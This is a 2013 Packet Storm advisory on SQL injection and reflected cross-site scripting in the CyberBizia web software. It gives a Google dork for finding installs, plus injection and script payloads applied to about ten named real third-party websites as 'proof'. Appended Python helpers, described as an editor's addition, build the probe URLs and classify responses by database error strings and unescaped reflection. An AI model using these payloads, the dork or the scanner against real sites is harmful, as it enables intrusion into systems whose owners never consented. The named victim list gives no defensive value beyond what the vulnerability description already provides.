CyberBizia Cross Site Scripting / SQL Injection

2013-08-29T00:00:00
ID PACKETSTORM:123010
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-08-29T00:00:00

Description

#********************************************************************************  
# Exploit Title : CyberBizia Multiple Vulnerabilities  
#  
# Software link : http://www.cyberbizia.com  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Tested on: Windows 7 , Linux  
#  
# Google Dork : intext:"Powered by CyberBizia"  
#  
# Date: 2013/08/30  
#  
--------------------------------------------------------------------  
# Exploit 1 : Sql Injection  
#  
# Location : [Target]/myasg/os.asp?elenca=mese&mese=[Sql Injection]  
#  
#  
# Proof:  
#  
# http://www.advancedcardiology.it/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.artielavori.com/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.basketquartu.it/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.cdsdonnecagliari.it/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.digicsoft.it/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.costiauto.com/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.immobiliarevacanze.it/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.magico-web.it/myasg/os.asp?elenca=mese&mese=1'  
#  
# http://www.archibaleno.it/myasg/os.asp?elenca=mese&mese=1'  
--------------------------------------------------------------------  
# Exploit 2 : Cross Site Scripting (reflected)  
#  
# Location : [Target]/?Title=[xss]  
#  
#  
# Proof:  
#  
# http://www.advancedcardiology.it/?Title="/><script>alert(1);</script>  
#  
# http://www.artielavori.com/?Title="/><script>alert(1);</script>  
#  
# http://www.basketquartu.it/?Title="/><script>alert(1);</script>  
#  
# http://www.cdsdonnecagliari.it/?Title="/><script>alert(1);</script>  
#  
# http://www.digicsoft.it/?Title="/><script>alert(1);</script>  
#  
# http://www.costiauto.com/?Title="/><script>alert(1);</script>  
#  
# http://www.immobiliarevacanze.it/?Title="/><script>alert(1);</script>  
#  
# http://www.mozzarellina.com/?Title="/><script>alert(1);</script>  
#  
# http://www.archibaleno.it/?Title="/><script>alert(1);</script>  
#  
######################  
discovered by : ACC3SS  
######################  
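The advisory only lists proof URLs; it does not say what response distinguishes a vulnerable install from a clean one. The following helper is an added example (editor's code, not part of the advisory and not CyberBizia's code) that builds both probes with proper URL encoding and classifies responses offline. It assumes classic ASP / ADO error strings for the SQL injection check (the advisory quotes no error text) and uses constructed sample responses rather than anything captured from the listed sites. The XSS check distinguishes a verbatim reflection of `"/><script>alert(1);</script>` from an HTML-encoded one, which is the difference between a finding and a false positive.

```python
"""
Offline re-check helpers for the two CyberBizia findings in the advisory.

Added example, not the advisory's or CyberBizia's own code. Assumptions:
  - SQL_ERROR_SIGNATURES are typical classic ASP / ADO messages; the
    advisory itself quotes none, so adjust to what a target really returns.
  - All SAMPLE_* bodies below are constructed, not captured from any site.
"""
import html
from urllib.parse import urlencode, urljoin

# Locations named in the advisory
SQLI_PATH = "/myasg/os.asp"
XSS_PAYLOAD = '"/><script>alert(1);</script>'

# Assumed error fragments; a bare quote usually surfaces one of these on
# classic ASP sites backed by Access (Jet) or SQL Server.
SQL_ERROR_SIGNATURES = (
    "microsoft ole db provider",
    "microsoft jet database engine",
    "unclosed quotation mark",
    "syntax error in string in query expression",
    "error '80040e14'",
)


def sqli_probe_url(base, value="1'"):
    """Advisory probe: os.asp?elenca=mese&mese=1' (the quote URL-encoded as %27)."""
    return urljoin(base, SQLI_PATH) + "?" + urlencode({"elenca": "mese", "mese": value})


def xss_probe_url(base, payload=XSS_PAYLOAD):
    """Advisory probe: /?Title=<payload>, fully percent-encoded."""
    return urljoin(base, "/") + "?" + urlencode({"Title": payload})


def looks_like_sql_error(body):
    lowered = body.lower()
    return any(sig in lowered for sig in SQL_ERROR_SIGNATURES)


def sqli_verdict(baseline_body, probe_body):
    """Compare the response for mese=1 against mese=1'.

    An error that appears only with the quote is the indicator; an error on
    both is just a broken page and proves nothing about injection.
    """
    base_err = looks_like_sql_error(baseline_body)
    probe_err = looks_like_sql_error(probe_body)
    if probe_err and not base_err:
        return "likely-injectable"
    if probe_err and base_err:
        return "error-on-both"
    return "no-error"


def xss_verdict(body, payload=XSS_PAYLOAD):
    """'reflected-raw' when the payload lands verbatim (exploitable),
    'reflected-encoded' when only an HTML-escaped copy is present (safe),
    'not-reflected' otherwise."""
    if payload in body:
        return "reflected-raw"
    if html.escape(payload, quote=True) in body:
        return "reflected-encoded"
    return "not-reflected"


# Constructed sample responses (illustrative only)
SAMPLE_BASELINE = "<html><body><ul><li>01/2013</li></ul></body></html>"
SAMPLE_SQLI_ERROR = (
    "Microsoft JET Database Engine error '80040e14'\n"
    "Syntax error in string in query expression 'mese=1''."
)
SAMPLE_XSS_RAW = '<input type="text" value=""/><script>alert(1);</script>">'
SAMPLE_XSS_ENCODED = (
    '<input type="text" value="&quot;/&gt;&lt;script&gt;alert(1);&lt;/script&gt;">'
)


def run_samples(base="http://www.example.test"):
    """Run every check over the constructed samples and return the verdicts."""
    return {
        "sqli_url": sqli_probe_url(base),
        "xss_url": xss_probe_url(base),
        "sqli": sqli_verdict(SAMPLE_BASELINE, SAMPLE_SQLI_ERROR),
        "sqli_broken_site": sqli_verdict(SAMPLE_SQLI_ERROR, SAMPLE_SQLI_ERROR),
        "xss_raw": xss_verdict(SAMPLE_XSS_RAW),
        "xss_encoded": xss_verdict(SAMPLE_XSS_ENCODED),
    }


if __name__ == "__main__":
    for key, value in run_samples().items():
        print(f"{key}: {value}")
```

Sending a lone `'` is a detection step, not proof: a database error confirms that user input reaches the query unescaped, but confirming actual data extraction needs a boolean or UNION based follow-up, which is outside what the advisory shows. The example encodes the quote as `%27`; the advisory's raw-quote URLs are equivalent on the server side, since the ASP request object decodes both the same way.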